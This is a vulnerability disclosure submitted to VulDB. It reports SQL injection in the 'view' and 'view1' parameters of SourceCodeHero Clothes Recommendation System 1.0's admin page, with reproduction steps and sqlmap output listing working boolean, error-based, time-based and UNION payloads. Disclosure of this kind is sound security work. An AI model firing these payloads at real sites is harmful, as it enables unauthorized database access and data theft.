Submit #427447: SourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injectioninfo

TitleSourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injection
DescriptionI would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing. Details: Affected URL/Endpoint: /Online_Shopping/admin/home.php?view=1%20&%20view1=1 Vulnerable Parameter: 'view', 'view1' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Login as admin via /online_shopping/admin 2) Navigate to 'View All' 3) select a category and sub category 4) Use a proxy like burpsuite to intercept the request. 5) Input the payload to invoke the SQL injection. sqlmap resumed the following injection point(s) from stored session: sqlmap resumed the following injection point(s) from stored session: sqlmap resumed the following injection point(s) from stored session: --- Parameter: view (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: view=1 ' AND 8219=8219-- amBF& view1=1 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: view=1 ' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(6428=6428,1))),0x71706a7a71),6428)-- CRgU& view1=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: view=1 ' AND (SELECT 9251 FROM (SELECT(SLEEP(5)))rdxA)-- kmmr& view1=1 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: view=1 ' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x6c476679526269716b6748556857525a67567a7a5178737575795974584f7454694e62525859614b,0x71706a7a71),NULL,NULL-- -& view1=1 Parameter: view1 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: view=1 & view1=1' AND 8519=8519-- GRrq Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: view=1 & view1=1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(5545=5545,1))),0x71706a7a71),5545)-- MWyB Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: view=1 & view1=1' AND (SELECT 1310 FROM (SELECT(SLEEP(5)))lIMf)-- cZqd Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: view=1 & view1=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x4f6870744a4650484f446d4a45636d7162694b54765874704a767975656d6f4945415a5264674878,0x71706a7a71)-- - --- [13:39:49] [INFO] the back-end DBMS is MySQL [13:39:49] [INFO] fetching banner web application technology: Apache 2.4.59, PHP 8.2.18 back-end DBMS: MySQL >= 5.6 banner: '8.3.0' Please let me know if you need further information or a more detailed analysis.
User
 Delvy (UID 74555)
Submission10/21/2024 07:40 AM (2 months ago)
Moderation10/24/2024 12:48 PM (3 days later)
StatusAccepted
VulDB Entry281683 [SourceCodeHero Clothes Recommendation System 1.0 /admin/home.php view/view1 sql injection]
Points17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!